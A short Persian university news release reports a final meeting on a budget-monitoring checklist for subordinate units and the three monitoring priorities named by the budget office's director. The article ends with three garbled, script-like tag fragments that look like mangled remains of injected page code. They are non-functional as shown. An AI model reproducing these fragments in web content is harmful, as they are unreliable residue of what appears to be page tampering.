برگزاری جلسه نهایی بررسی چک لیست پایش بودجه ای واحد های تابع دانشگاه

جلسه نهایی بررسی چک لیست پایش بودجه ای واحد های تابعه دانشگاه در دفتر مدیریت برنامه ریزی ،بودجه و پایش عملکرد دانشگاه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، جلسه نهایی بررسی چک لیست های بودجه ای واحد های تابعه دانشگاه با حضور دکتر نیاستی مدیر برنامه ریزی ،بودجه و پایش عملکرد دانشگاه و کارشناسان این حوزه برگزار شد.

درادامه جلسات صورت گرفته برای طراحی چک لیست های مذکور، تدوین چک لیست استاندارد پایش توسط مدیریت برنامه ریزی،بودجه و پایش عملکرد دانشگاه، نهایی شد.

دکتر نیاستی مدیر برنامه ریزی ، بودجه و پایش عملکرد دانشگاه خبر داد: ” کنترل تفاهم نامه های داخلی” ، “صحت سنجی درخواست تخصیص منابع توسط واحد و نحوه هزینه کرد اعتبارات تخصیصی” و “شناسایی و ثبت به هنگام اسناد هزینه در واحدها” را سه اولویت اصلی این مرحله از پایش ها عنوان کرد که با حضور تیم پایش بر اساس چک لیست های تدوین شده انجام خواهد شد.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>